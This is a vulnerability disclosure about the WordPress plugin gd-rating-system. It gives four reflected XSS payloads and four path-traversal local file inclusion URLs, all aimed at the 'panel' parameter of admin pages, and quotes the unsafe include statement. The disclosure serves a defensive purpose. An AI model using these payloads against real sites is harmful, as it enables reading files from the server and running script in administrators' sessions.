Skip to content
Permalink
Branch: master
Find file Copy path
Find file Copy path
Fetching contributors…
Cannot retrieve contributors at this time
146 lines (90 sloc) 2.63 KB

Well ,sir ,I just found some XSS bugs and LFI(Local File Include) bug here.

ADLab of Venustech

The report link to the wordpress-form is missing, because the manager do not wish to put the public in danger ,I'll just write some details here.

XSS

Here different php files suffer from the bug, exactly, some other files also don't filter well.

XSS1
http://localhost/wordpress/wp-admin/admin.php?page=gd-rating-system-information&panel=x

Weak para poc:

panel=%27%22%3E%3Csvg%2Fonload%3Dconsole.log(%2Fxss%2F)%3E%3C%27%22
XSS2
http://localhost/wordpress/wp-admin/admin.php?page=gd-rating-system-about&panel=x

Weak para poc:

panel=%27%22%3E%3Csvg%2Fonload%3Dconsole.log(%2Fxss2%2F)%3E%3C%27%22
XSS3
http://localhost/wordpress/wp-admin/admin.php?page=gd-rating-system-transfer&panel=x

Weak para poc:

panel=%27%22%3E%3Csvg%2Fonload%3Dconsole.log(%2Fxss3%2F)%3E%3C%27%22
XSS4
http://localhost/wordpress/wp-admin/admin.php?page=gd-rating-system-tools&panel=x

Weak para poc:

panel=%27%22%3E%3Csvg%2Fonload%3Dconsole.log(%2Fxss4%2F)%3E%3C%27%22

image

LFI

Here we use the bug to include the "phpinfo.php" file in the wwwroot, exactly, we can include or read any file in the webserver.

LFI1 poc
http://localhost/wordpress/wp-admin/admin.php?page=gd-rating-system-information&panel=..%2F..%2F..%2F..%2F..%2F..%2Fphpinfo

Weak file:

/forms/information.php

Weak code:

include(GDRTS_PATH.'forms/panels/'.$_panel.'.php');
LFI2 poc
http://localhost/wordpress/wp-admin/admin.php?page=gd-rating-system-about&panel=..%2F..%2F..%2F..%2F..%2F..%2Fphpinfo

Weak file:

/forms/about.php

Weak code:

include(GDRTS_PATH.'forms/panels/'.$_panel.'.php');
LFI3 poc
http://localhost/wordpress/wp-admin/admin.php?page=gd-rating-system-transfer&panel=..%2F..%2F..%2F..%2F..%2F..%2Fphpinfo

Weak file:

/forms/transfer.php

Weak code:

include(GDRTS_PATH.'forms/panels/'.$_panel.'.php');
LFI4 poc
http://localhost/wordpress/wp-admin/admin.php?page=gd-rating-system-tools&panel=..%2F..%2F..%2F..%2F..%2F..%2Fphpinfo

Weak file:

/forms/tools.php

Weak code:

include(GDRTS_PATH.'forms/panels/'.$_panel.'.php');

image

Well, by the way, I just test these bugs in the wordpress 4.9.1 and the latest version of the wp-plugin gd-rating-system.

You can’t perform that action at this time.